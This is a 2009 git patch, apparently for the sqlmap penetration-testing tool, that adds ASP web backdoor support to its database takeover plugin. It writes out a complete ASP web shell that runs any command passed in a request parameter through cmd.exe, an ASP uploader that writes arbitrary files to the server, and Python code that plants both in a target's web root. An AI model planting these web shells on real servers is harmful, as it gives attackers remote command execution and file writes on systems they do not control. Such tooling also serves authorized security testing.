From c5d20b8a86ad0a4718ef0c71364ebf59b732a9da Mon Sep 17 00:00:00 2001
From: Bernardo Damele <bernardo.damele@gmail.com>
Date: Wed, 6 May 2009 12:14:38 +0000
Subject: [PATCH] Initial support for ASP web backdoor functionality

---
 lib/request/connect.py      |  3 ++
 plugins/generic/takeover.py | 93 ++++++++++++++++++++++++++++---------
 shell/backdoor.asp          | 44 ++++++++++++++++++
 shell/uploader.asp          |  3 +-
 4 files changed, 121 insertions(+), 22 deletions(-)
 create mode 100644 shell/backdoor.asp

diff --git a/lib/request/connect.py b/lib/request/connect.py
index 3138f7aba..226265ba6 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
@@ -92,6 +92,9 @@ class Connect:
                 url = "%s?%s" % (url, params)
                 requestMsg += "?%s" % params
 
+            if post:
+                post = urlencode(post).replace("%%", "%")
+
         elif multipart:
             multipartOpener = urllib2.build_opener(multipartpost.MultipartPostHandler)
             conn = multipartOpener.open(url, multipart)
diff --git a/plugins/generic/takeover.py b/plugins/generic/takeover.py
index 1f481c185..4473fbc2a 100644
--- a/plugins/generic/takeover.py
+++ b/plugins/generic/takeover.py
@@ -113,15 +113,14 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
 
     def __webBackdoorInit(self):
         """
-        This method is used to write a PHP agent (cmd.php) on a writable
+        This method is used to write a web backdoor (agent) on a writable
         remote directory within the web server document root.
-        Such agent is written using the INTO OUTFILE MySQL DBMS
-        functionality
         """
 
         self.checkDbmsOs()
 
         backdoorUrl = None
+        language    = None
         kb.docRoot  = getDocRoot()
         directories = getDirs()
         directories = list(directories)
@@ -130,11 +129,44 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
         infoMsg = "trying to upload the uploader agent"
         logger.info(infoMsg)
 
-        # TODO: backdoor and uploader extensions must be the same as of
-        # the web application language in use
-        backdoorName = "backdoor.php"
+        message  = "which web application language does the web server "
+        message += "support?\n"
+        message += "[1] ASP\n"
+        message += "[2] PHP (default)\n"
+        message += "[3] JSP"
+
+        while True:
+            choice = readInput(message, default="2")
+
+            if not choice or choice == "2":
+                language = "php"
+
+                break
+
+            elif choice == "1":
+                language = "asp"
+
+                break
+
+            elif choice == "3":
+                # TODO: add also JSP backdoor/uploader support
+                errMsg  = "JSP web backdoor functionality is not yet "
+                errMsg += "implemented"
+                raise sqlmapUnsupportedDBMSException, errMsg
+
+                #language = "jsp"
+
+                #break
+
+            elif not choice.isdigit():
+                logger.warn("invalid value, only digits are allowed")
+
+            elif int(choice) < 1 or int(choice) > 3:
+                logger.warn("invalid value, it must be 1 or 3")
+
+        backdoorName = "backdoor.%s" % language
         backdoorPath = "%s/%s" % (paths.SQLMAP_SHELL_PATH, backdoorName)
-        uploaderName = "uploader.php"
+        uploaderName = "uploader.%s" % language
         uploaderStr  = fileToStr("%s/%s" % (paths.SQLMAP_SHELL_PATH, uploaderName))
 
         for directory in directories:
@@ -165,25 +197,44 @@ class Takeover(Abstraction, DEP, Metasploit, Registry):
             logger.info(infoMsg)
 
             # Upload the backdoor through the uploader agent
-            multipartParams = {
-                                "upload":    "1",
-                                "file":      open(backdoorPath, "r"),
-                                "uploadDir": directory,
-                              }
-            page = Request.getPage(url=uploaderUrl, multipart=multipartParams)
+            if language == "php":
+                multipartParams = {
+                                    "upload":    "1",
+                                    "file":      open(backdoorPath, "r"),
+                                    "uploadDir": directory,
+                                  }
+                page = Request.getPage(url=uploaderUrl, multipart=multipartParams)
 
-            if "Backdoor uploaded" not in page:
-                warnMsg  = "unable to upload the backdoor through "
-                warnMsg += "the uploader agent on '%s'" % directory
-                logger.warn(warnMsg)
+                if "Backdoor uploaded" not in page:
+                    warnMsg  = "unable to upload the backdoor through "
+                    warnMsg += "the uploader agent on '%s'" % directory
+                    logger.warn(warnMsg)
 
-                continue
+                    continue
+
+            elif language == "asp":
+                backdoorRemotePath = "%s/%s" % (directory, backdoorName)
+                backdoorRemotePath = os.path.normpath(backdoorRemotePath)
+                backdoorContent = open(backdoorPath, "r").read()
+                postStr = "f=%s&d=%s" % (backdoorRemotePath, backdoorContent)
+                page, _ = Request.getPage(url=uploaderUrl, direct=True, post=postStr)
+
+                if "permission denied" in page.lower():
+                    warnMsg  = "unable to upload the backdoor through "
+                    warnMsg += "the uploader agent on '%s'" % directory
+                    logger.warn(warnMsg)
+
+                    continue
+
+            elif language == "jsp":
+                # TODO: add also JSP backdoor/uploader support
+                pass
 
             backdoorUrl = "%s/%s" % (baseUrl, backdoorName)
 
-            infoMsg  = "the backdoor has been successfully uploaded on "
-            infoMsg += "'%s', go with your browser to " % directory
-            infoMsg += "'%s' and enjoy it!" % backdoorUrl
+            infoMsg  = "the backdoor has probably been successfully "
+            infoMsg += "uploaded on '%s', go with your browser " % directory
+            infoMsg += "to '%s' and enjoy it!" % backdoorUrl
             logger.info(infoMsg)
 
             break
diff --git a/shell/backdoor.asp b/shell/backdoor.asp
new file mode 100644
index 000000000..c2278aaea
--- /dev/null
+++ b/shell/backdoor.asp
@@ -0,0 +1,44 @@
+<!--
+
+ASP_KIT
+
+cmd.asp = Command Execution
+
+by: Maceo
+modified: 25/06/2003
+
+-->
+
+<%
+Set oScript = Server.CreateObject("WSCRIPT.SHELL")
+Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
+Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
+
+szCMD = request("cmd")
+
+If (szCMD <> "") Then
+  szTempFile = "C:\" & oFileSys.GetTempName()
+  Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
+  Set oFile = oFileSys.OpenTextFile(szTempFile, 1, False, 0)
+  End If
+%>
+
+<HTML>
+<BODY>
+<FORM action="" method="GET">
+<input type="text" name="cmd" size=45 value="<%= szCMD %>">
+<input type="submit" value="Run">
+</FORM>
+<PRE>
+<%= "\\" & oScriptNet.ComputerName & "\" & oScriptNet.UserName %>
+<br>
+<%
+  If (IsObject(oFile)) Then
+    On Error Resume Next
+    Response.Write Server.HTMLEncode(oFile.ReadAll)
+    oFile.Close
+    Call oFileSys.DeleteFile(szTempFile, True)
+  End If
+%>
+</BODY>
+</HTML>
diff --git a/shell/uploader.asp b/shell/uploader.asp
index 91ca00158..2a45ccc5a 100644
--- a/shell/uploader.asp
+++ b/shell/uploader.asp
@@ -1 +1,2 @@
-<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>
\ No newline at end of file
+<p><b>sqlmap backdoor uploader</b></p>
+<%set f = server.createobject("Scripting.FileSystemObject"):set o=f.OpenTextFile(Request("f"), 2, True):o.Write Request("d"):o.Close:set o=Nothing:set f=Nothing%>